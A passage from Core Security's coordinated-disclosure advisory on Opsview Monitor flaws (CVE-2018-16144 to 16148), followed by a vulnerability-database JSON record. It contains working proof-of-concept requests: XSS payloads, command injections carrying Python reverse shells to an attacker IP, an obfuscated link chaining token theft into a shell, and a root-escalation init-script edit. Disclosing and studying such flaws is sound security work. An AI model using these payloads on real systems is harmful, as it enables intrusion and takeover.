Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-----/
7.2. Persistent Cross-Site Scripting in Settings endpoint
[CVE-2018-16147] The 'data' parameter of the '/settings/api/router' endpoint is vulnerable to Cross-Site Scripting. The following proof of concept demonstrates the vulnerability:
/-----
POST /settings/api/router?_dc=1521575692128 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: rifle
x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 506
Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D
Connection: close

[{"action":"SettingsServer","method":"setObjecttypeState","data":["alert(4)","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/
The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It is important to point out that this XSS is self-stored and is executed only in the context of the victim's session. However, this vulnerability can be exploited by an attacker to gain persistence and execute the malicious code each time the victim accesses the settings section.
Excerpt of the source code showing the injected script tag:
/----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"alert(4)":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"alert(4)":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/
7.3.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 376 Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=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%3D%3D Connection: close
{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"} -----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. This token could be obtained by a Cross-Site Scripting attack from a specific endpoint (/settings).
. Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login.
The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:
/----- https:///login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%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%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/
Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell.
7.4. Rancid test connection functionality abuse leading to command execution
[CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to improper sanitization of the 'rancid_password' parameter.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 434 Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close
ip=++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&host_id=2
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
$ uname -a
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
-----/
7.5. Script modification could allow local privilege escalation
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios privileges, and the scripts that run at boot time impersonate the nagios user during their execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges.
The following excerpt shows the vulnerable code:
/-----
/etc/init.d/opsview-reporting-module:

/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
    echo "Attempted to start jasperserver but MySQL credentials are wrong."
    exit 0
fi

DAEMON=/opt/opsview/jasper/bin/rc.jasperserver

test -x $DAEMON || exit 0

# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
    su - opsview -c "$DAEMON $@"
else
    exec $DAEMON $@
fi
-----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group.
/-----
ls -ltr /opt/opsview/jasper/bin/db_jasper
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper
nagios@image-builder-299:/home/admin$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted.
The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges:
/----- while [ "x$1" != "x" ] ; do case "$1" in db_export) db_export ;; db_export_test) db_export_test ;; db_export_initial) TEST=1 db_backup ;; db_import) db_import ;; db_install) db_install ;; db_backup) db_backup ;; db_restore) db_restore ;; db_exists) python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' & db_exists exit $? ;; db_upgrade) db_upgrade exit $? ;; *) die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}" ;;
esac
shift
done -----/
/-----
$nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [] port 16000 [tcp/*] accepted (family 2, sport 45566)
id
uid=0(root) gid=0(root) groups=0(root)
-----/
- Report Timeline
2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send the draft advisory.
2018-05-04: Opsview replied attaching its GPG keys.
2018-05-04: Core Security sent the encrypted draft advisory.
2018-05-04: Opsview confirmed the reception of the advisory and informed that an initial response would be ready by May 11th.
2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that they were planning to release a fix for these versions by the end of July.
2018-05-11: Core Security thanked Opsview for the confirmation.
2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August.
2018-06-27: Core Security thanked Opsview for the status update and asked for a tentative public disclosure date.
2018-07-16: Core Security requested a status update.
2018-07-18: Opsview proposed to set a tentative publication date by the end of August, when they release the fixes for its earlier versions.
2018-07-18: Core Security agreed with Opsview's proposal.
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product.
2018-08-06: Core Security requested a status update for the remaining fixes.
2018-08-13: Opsview replied saying that they were targeting the week of August 24th to release the fixes for their earlier product versions and that they would confirm the exact date at the end of the next week.
2018-08-13: Core Security thanked Opsview for the reply.
2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th.
2018-08-24: Core Security thanked Opsview for the update and proposed September 4th as the coordinated release date.
2018-08-28: Opsview agreed on the proposed release date.
2018-09-04: Advisory CORE-2018-0008 published.
- References
[1] https://www.opsview.com/solutions
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0904",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "opsview",
"scope": "gte",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.0"
},
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "opsview",
"scope": "lt",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.x"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.4"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.3"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16146"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Fernando Diaz, Fernando Catoira",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 0.1
},
"cve": "CVE-2018-16146",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-16146",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-17453",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-16146",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-16146",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-17453",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-155",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-16146",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account. Opsview Monitor The monitor contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization\u0027s network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a command execution vulnerability that allows an attacker to obtain command execution on the system as a nagios user. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nOpsview Monitor Multiple Vulnerabilities\n\n1. **Advisory Information**\n\nTitle: Opsview Monitor Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0008\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities\nDate published: 2018-09-04\nDate of last update: 2018-09-04\nVendors contacted: Opsview\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Special Elements used in an OS\nCommand [CWE-78], Improper Neutralization of Special Elements used in\nan OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,\nCVE-2018-16145\n\n3. 
**Vulnerability Description**\n\nOpsview\u0027s website states that:\n\nOpsview[1] builds monitoring software that helps DevOps understand how\nthe performance of their hybrid IT infrastructure \u0026 apps impacts\nbusiness service delivery. Opsview Monitor supports +3500 Nagios plugins\nand service checks making it easy to monitor everything from Docker and\nVMware to Amazon Web Services, Hyper-V and more. \n\n4. **Vulnerable Packages**\n\n . Opsview Monitor 5.4\n . Opsview Monitor 5.3\n . Opsview Monitor 5.2\n\nOther products and versions might be affected, but they were not tested. \n\n5. **Vendor Information, Solutions and Workarounds**\n\nOpsview released the following versions of its product that fix the\nreported issues. Opsview Monitor 6.0\n . Opsview Monitor 5.4.2\n . Opsview Monitor 5.3.1\n\nIn addition, Opsview published the following release notes:\n\n . https://knowledge.opsview.com/v5.4/docs/whats-new\n . https://knowledge.opsview.com/v5.3/docs/whats-new\n\n6. **Credits**\n\nThese vulnerabilities were discovered and researched by Fernando Diaz\nand Fernando Catoira from Core Security Consulting Services. The\npublication of this advisory was coordinated by Leandro Cuozzo from Core\nAdvisories Team. \n \n7. \nMultiple vulnerabilities were found in the context of this appliance,\nwhich could allow a remote attacker to compromise the system. \nVulnerabilities described in 7.1 and 7.2 could be abused to execute\nmalicious JavaScript code in the context of a legitimate user. Finally, the\nissue found in one of the scripts run during the boot process presented\nin 7.5 would allow attackers to elevate their privileges from nagios\nuser to root after a system restart, hence obtaining full control of the\nappliance. \n\n7.1. **Reflected Cross-Site Scripting in Diagnostics**\n\n[CVE-2018-16148] The \u0027diagnosticsb2ksy\u0027 parameter of the \u0027/rest\u0027\nendpoint is vulnerable to Cross-Site Scripting. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;\nauth_tkt=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%3D%3D\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n-----/\n\n7.2. **Persistent Cross-Site Scripting in Settings endpoint**\n\n[CVE-2018-16147] The \u0027data\u0027 parameter of the \u0027/settings/api/router\u0027\nendpoint is vulnerable to Cross-Site Scripting. The following proof of\nconcept demonstrates the vulnerability:\n \n/-----\nPOST /settings/api/router?_dc=1521575692128 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: rifle\nx-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 506\nCookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;\nauth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D\nConnection: 
